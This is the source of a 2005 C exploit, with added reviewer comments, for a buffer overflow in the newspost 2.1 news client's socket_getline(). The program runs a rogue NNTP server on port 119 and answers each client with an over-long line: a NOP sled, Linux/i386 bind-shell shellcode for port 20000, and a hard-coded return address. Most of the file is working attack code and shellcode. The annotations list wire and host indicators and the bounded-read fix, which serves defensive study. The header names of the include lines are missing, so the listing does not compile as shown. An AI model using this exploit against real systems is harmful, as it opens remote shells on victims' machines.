/*
 * 02/03/2005
 *
 * NOTES:
 *   - Newspost "socket_getline()" Buffer Overflow Exploit
 *
 * Client Usage
 * ------------
 *   cybertronic:~/newspost-2.1> ./newspost -i -n cyber -s tronic
 *
 * Greetz fly to my girlfriend YASMIN H.
 * just want to say love you dad!
 *
 * cybertronic 2oo5
 *
 * (The ASCII-art banner that stood here was mis-encoded and collapsed onto
 * one line by the page extraction; it carried no technical content and is
 * omitted.)
 *
 * Reviewer summary
 * ----------------
 * This program acts as a rogue NNTP server: it listens on TCP port 119 and
 * answers every incoming connection with a single over-long line of raw
 * bytes. Per the title above, the affected code is the line reader
 * socket_getline() in the newspost 2.1 client, i.e. the victim is whoever
 * points the client at an untrusted news server.
 *
 * What a defender can take from the code below:
 *   - The server's first line is 1056 bytes, starts with 956 bytes of 0x90
 *     and carries no line terminator; a normal NNTP greeting is a short
 *     text line, so this is easy to flag on the wire.
 *   - According to the author's comment the payload is a bind shell on TCP
 *     port 20000; an unexpected listener on that port, or a shell started by
 *     the news client process, is the host-side indicator.
 *   - The return address is one fixed constant, so the attack assumes a
 *     fixed stack layout and an executable stack on the client.
 *   - The durable fix is on the client side: the line reader must bound
 *     every read to the size of the destination buffer.
 */

/* NOTE(review): five #include directives follow, but the header names were
 * apparently stripped (angle brackets lost) when the page was extracted, so
 * the listing does not compile as shown. */
#include
#include
#include
#include
#include

/* ANSI colour escapes for the status output ("\E" is a compiler extension
 * for the ESC character). */
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

#define PORT 119     /* standard NNTP port the fake server listens on */
#define BACKLOG 5    /* listen() queue length */

//92 bytes bindcode port 20000
/*
 * Author-supplied Linux/i386 machine code (92 bytes plus the string's NUL).
 * Going by the author's mnemonics it issues int 80h with al = 102 four times
 * (presumably socketcall: socket, bind, listen, accept), then al = 63 in a
 * loop (presumably dup2 onto the accepted descriptor), then a final call
 * after pushing the bytes of "//bin/sh". "push word 8270" stores 0x4e 0x20,
 * which is port 20000 in network byte order. The array contains no zero
 * byte before its terminator, which is what lets cmd() treat the buffer as
 * a C string.
 */
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h

void cmd ( int connfd );
void header ();

/*
 * Entry point: prints the banner, opens a TCP listener on PORT on all local
 * addresses, and forks one child per accepted connection; the child calls
 * cmd() on the connected socket. Command-line arguments are not used.
 */
int main ( int argc, char* argv[] )
{
	int listenfd, connfd;
	pid_t childpid;
	socklen_t clilen;
	struct sockaddr_in cliaddr, servaddr;

	header ();
	printf ( "[*] Creating socket..." );
	if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
	{
		printf ( RED "FAILED!\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );

	/* Listen on every local interface, port 119. */
	bzero ( &servaddr, sizeof ( servaddr ) );
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
	servaddr.sin_port = htons ( PORT );

	/* The result of bind() is not checked. */
	bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
	printf ( "[*] Listening..." );
	if ( listen ( listenfd, BACKLOG ) == -1 )
	{
		printf ( RED "FAILED!\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );

	for ( ; ; )
	{
		clilen = sizeof ( cliaddr );
		if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
		{
			close ( listenfd );
			exit ( 1 );
		}
		if ( ( childpid = fork ( ) ) == 0 )
		{
			/* Child: serve this one connection. There is no explicit exit
			 * here; after cmd() the child falls through to close(connfd)
			 * and the next accept() on the listenfd it has just closed. */
			close ( listenfd );
			printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
			cmd ( connfd );
		}
		close ( connfd );
	}
}

/*
 * Builds the over-long line and writes it to the connected client socket s.
 *
 * Layout of out[] as assembled below:
 *   bytes   0..955   0x90 filler
 *   bytes 956..1047  scode (its terminating NUL is copied too and ends the
 *                    C string at offset 1048)
 *   next 4 bytes     "AAAA"
 *   next 4 bytes     the bytes of ret, appended with strncat
 * strlen(out) is therefore 1056, and no line terminator is appended.
 *
 * The local buffer in[] is declared but never used.
 * On a failed write the process prints FAILED and exits with status 1.
 */
void cmd ( int s )
{
	char in[1024], out[1200];
	/* Fixed address written where the saved return address is expected; it
	 * looks like a stack address of an older Linux/i386 layout (TODO
	 * confirm), so the attack depends on an unrandomised stack. */
	unsigned long ret = 0xbfffecb8;

	bzero ( &out, 1200 );
	memset ( out, 0x90, 956 ); //956
	memcpy ( out + 956, scode, sizeof ( scode ) );
	strcat ( out, "\x41\x41\x41\x41" );
	/* Appends the in-memory bytes of ret; this relies on none of them
	 * being zero, since strncat stops at a NUL byte. */
	strncat ( out, ( unsigned char* ) &ret, 4 );
	printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) );
	if ( write ( s, out, strlen ( out ) ) <= 0 )
	{
		printf ( RED "FAILED!\n" NORMAL);
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL);
	sleep ( 1 );
}

/*
 * Clears the terminal through system("clear") and prints the coloured
 * banner, the author's contact line and the target name "newspost-2.1".
 */
void header ()
{
	system ( "clear" );
	printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL);
	printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# # " GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# " YELLOW "# \n" NORMAL);
	printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# " YELLOW "# \n" NORMAL);
	printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# # " GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# " YELLOW "# \n" NORMAL);
	printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# # " GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL);
	printf ( RED " cybertronic@gmx.net\n" NORMAL );
	printf ( RED " ----------(c) 2005----------\n\n" NORMAL );
	printf ( "newspost-2.1\n\n" );
}